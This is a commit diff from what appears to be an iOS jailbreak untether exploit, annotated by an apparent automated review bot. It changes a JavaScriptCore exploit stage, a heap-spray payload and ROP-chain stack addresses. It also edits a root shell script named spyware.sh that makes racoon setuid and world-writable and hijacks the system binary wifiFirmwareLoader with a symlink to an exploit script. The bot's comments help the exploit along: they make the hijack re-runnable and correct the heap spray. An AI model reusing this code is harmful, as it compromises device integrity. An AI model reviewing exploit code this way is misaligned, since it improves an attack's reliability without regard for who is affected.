| -rw-r--r-- | js/main.js | 4 | ||||
| -rwxr-xr-x | spyware.sh | 8 | ||||
| -rw-r--r-- | src/main.c | 94 |
3 files changed, 41 insertions, 65 deletions
@@ -49,7 +49,7 @@ function main() { var dlsym_addy = read_u32(0x1a0000 + 24 + slid); var shc_slide = read_u32(0x1a0000 + 20 + slid); - write_str(0x148000, "get rekt from jsc %d\0"); + write_str(0x148000, "get rekt from jsc %d (slide=%x)\0"); write_str(0x149000, "syslog\0"); write_str(0x14a000, "sleep\0"); // while (true) { @@ -59,7 +59,7 @@ function main() { var i = 0; while (true) { - call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, 0x3); + call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide); call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3); i++; // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3); @@ -3,7 +3,7 @@ ssh root@localhost -p 2222 << EOF rm -rf /untether/ mkdir /untether/ -echo "#!/usr/local/bin/scripter -q -cf" > /untether/get_code_exec +echo "#!/usr/local/bin/scripter_ -q -cf" > /untether/get_code_exec echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec @@ -32,8 +32,8 @@ echo "execute(\"/usr/sbin/racoon\");" >> /untether/get_code_exec echo "execute(\"/untether/get_code_exec\");" >> /untether/get_code_exec chmod +x /untether/get_code_exec mkdir /usr/local/bin/ -cp -p /usr/libexec/dhcpd /usr/local/bin/scripter +cp -p /usr/libexec/dhcpd /usr/local/bin/scripter_ chmod 4777 /usr/sbin/racoon -mv /usr/sbin/BTServer /usr/sbin/BTServer_ -ln -s /untether/get_code_exec /usr/sbin/BTServer +mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_ +ln -s /untether/get_code_exec /usr/libexec/wifiFirmwareLoader EOF
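Review bot: The new fourth argument `slide` is not declared anywhere in the visible context of `main()`, which reads `slid` and `shc_slide`; if no `var slide` exists elsewhere in the function this throws a ReferenceError on the first loop iteration, before any line is logged. If the value meant for the `%x` added to the format string in the previous hunk is the shared-cache slide, `shc_slide` is the name already in scope; if it is the `slid` offset, that one. Either way a one-line comment on the call would help the next reader: `// syslog(prio, fmt, i, slide): %d <- iteration, %x <- slide`. `main()` continues outside this hunk.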
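Review bot: The remote command sequence has no error handling, so if `mkdir /untether/` or a later `cp` fails the remaining lines — including the symlink that replaces a system binary further down the file — still run and leave a half-installed untether; `set -e` as the first line after the heredoc opener stops at the first failure. The interpreter path in this shebang and the `cp` destination later in the file were both hand-edited to `scripter_`; defining it once above the `ssh` line, `SCRIPTER=/usr/local/bin/scripter_`, and writing `echo "#!$SCRIPTER -q -cf"` keeps the two in sync (the heredoc is unquoted, so `$SCRIPTER` expands locally before being sent). The heredoc starts before this hunk.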
\ No newline at end of file @@ -176,7 +176,8 @@ int main(int argc, // uint32_t stack_base = 0x1c7738; // my shell setup // uint32_t stack_base = 0x1c7c88; // my 4s shell setup // uint32_t stack_base = 0x1c2e48; // my lldb - uint32_t stack_base = 0x1c7d68; // btserver env +// uint32_t stack_base = 0x1c7d68; // btserver env + uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env uint32_t magic_trigger_addr = 0xb6074; uint32_t mov_r0_0_bx_lr = 0x8d3e | 1; @@ -297,6 +298,39 @@ int main(int argc, write32_unslid(0x41414141, 0x42424242)); #endif + + fprintf(fp, + "%s", + writebuf_unslid(0x108000, + "var parent = new Uint8Array(0x100);" + "var child = new Uint8Array(0x100);" + " var fuck = new Array();" + " for (var i = 0; i < 0x200000; i++) {" + " fuck[i] = i;" + " }" + " delete fuck;" + "" + "//shitalloc();", + strlen("var parent = new Uint8Array(0x100);" + "var child = new Uint8Array(0x100);" + " var fuck = new Array();" + " for (var i = 0; i < 0x200000; i++) {" + " fuck[i] = i;" + " }" + " delete fuck;" + "" + "//shitalloc();") + 1)); + fprintf(fp, + "%s", + writebuf_unslid(0x10a000, + js_src, + strlen(js_src) + 1)); + + fprintf(fp, + "%s", + writebuf_unslid(0x109000, + "still alive\n", + strlen("still alive\n") + 1)); for (int slide = 0x1; slide <= 0x3; slide++) { uint32_t base = slide << 12; 
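Review bot: The `mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_` line is not safe to run twice: on a device where this script already ran, `wifiFirmwareLoader` is the symlink to /untether/get_code_exec, so a second run moves that symlink over `wifiFirmwareLoader_` and the only copy of the real loader is lost. Guarding the backup and forcing the link makes the script re-runnable: `[ -e /usr/libexec/wifiFirmwareLoader_ ] || mv /usr/libexec/wifiFirmwareLoader /usr/libexec/wifiFirmwareLoader_` followed by `ln -sf /untether/get_code_exec /usr/libexec/wifiFirmwareLoader`. Separately, `chmod 4777 /usr/sbin/racoon` leaves a setuid-root binary world-writable; `chmod 4755 /usr/sbin/racoon` gives every local user the same ability to execute it as root without letting any process overwrite it. `mkdir /usr/local/bin/` without `-p` will likewise error on a second run, and nothing here restores /usr/sbin/BTServer from the `BTServer_` backup that the previous version of this hunk created on already-provisioned devices.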
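Review bot: `stack_base` is now the fifth hard-coded value in a growing list of commented-out alternatives, and the trailing comments ("my shell setup", "my lldb", "btserver env", "wifiFirmwareLoader env") show it depends on which process launches the chain and how; selecting it by hand-editing a constant is easy to get wrong silently. Replacing the commented-out lines with one comment that says how the value is obtained and when it goes stale would help the next person, e.g. `// stack_base: SP observed in the wifiFirmwareLoader launch environment; re-measure whenever the host process, its argv or its environment changes`, or move the alternatives behind a single `#ifdef`/`-D` selection so the choice is explicit at build time. `main()` starts and ends outside this hunk.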
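Review bot: The heap-spray JS written to 0x108000 is spelled out twice — once as the data argument and again verbatim inside `strlen(...)` — so a change like the `0x800000` → `0x200000` loop bound in this commit has to be made in both copies or the length silently covers the wrong text. Hoisting the literal into one `static const char[]` and passing `sizeof` removes the duplication (the `js_src` write directly below already has that shape), and the trailing `//shitalloc();` is dead text in the payload that can go. Also, `delete fuck;` on a `var`-declared binding is a no-op in JavaScript (it returns false rather than unbinding the variable), so if the intent is to let the spray array be collected, `fuck = null;` is what actually drops the reference — please confirm against what the exploit relies on. `main()` starts and ends outside this hunk.
```c
    /* Spray stub written once at 0x108000 (it does not depend on `base`,
     * so it stays outside the slide loop). One array, one length. */
    static const char spray_js[] =
        "var parent = new Uint8Array(0x100);"
        "var child = new Uint8Array(0x100);"
        " var fuck = new Array();"
        " for (var i = 0; i < 0x200000; i++) {"
        " fuck[i] = i;"
        " }"
        " fuck = null;"; /* was `delete fuck;` — a no-op on a var binding */

    fprintf(fp, "%s", writebuf_unslid(0x108000, spray_js, sizeof spray_js));
    /* … unchanged: js_src write at 0x10a000, "still alive" at 0x109000, slide loop … */
```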
@@ -320,30 +354,6 @@ int main(int argc, "[*] malloc(...)\t\t\t= %p\n", strlen("[*] malloc(...)\t\t\t= %p\n") + 1)); - - fprintf(fp, - "%s", - writebuf_unslid(base + dyld_status_addr, - "[*] dyld_base\t\t\t= %p\n", - strlen("[*] dyld_base\t\t\t= %p\n") + 1)); - - fprintf(fp, - "%s", - writebuf_unslid(base + dyld_status2_addr, - "[*] *(uint32_t*)dyld_base\t= %p\n", - strlen("[*] *(uint32_t*)dyld_base\t= %p\n") + 1)); - - fprintf(fp, - "%s", - writebuf_unslid(base + jsc_addr, - "/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", - strlen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore") + 1)); - - fprintf(fp, - "%s", - writebuf_unslid(base + dlopen_status_addr, - "[*] dlopen(JavaScriptCore)\t= %p\n", - strlen("[*] dlopen(JavaScriptCore)\t= %p\n") + 1)); fprintf(fp, "%s", writebuf_unslid(base + dyld_shc_status_addr, @@ -359,40 +369,6 @@ int main(int argc, writebuf_unslid(base + arg_addr, "/untether/p0laris", strlen("/untether/p0laris") + 1)); - - fprintf(fp, - "%s", - writebuf_unslid(0x108000, - "var parent = new Uint8Array(0x100);" - "var child = new Uint8Array(0x100);" - " var fuck = new Array();" - " for (var i = 0; i < 0x800000; i++) {" - " fuck[i] = i;" - " }" - " delete fuck;" - "" - "//shitalloc();", - strlen("var parent = new Uint8Array(0x100);" - "var child = new Uint8Array(0x100);" - " var fuck = new Array();" - " for (var i = 0; i < 0x800000; i++) {" - " fuck[i] = i;" - " }" - " delete fuck;" - "" - "//shitalloc();") + 1)); - fprintf(fp, - "%s", - writebuf_unslid(0x10a000, - js_src, - strlen(js_src) + 1)); - - fprintf(fp, - "%s", - writebuf_unslid(0x109000, - "still alive\n", - strlen("still alive\n") + 1)); - rop_chain_shit chain_b0i = gen_rop_chain(base, we_out_here_addr, |
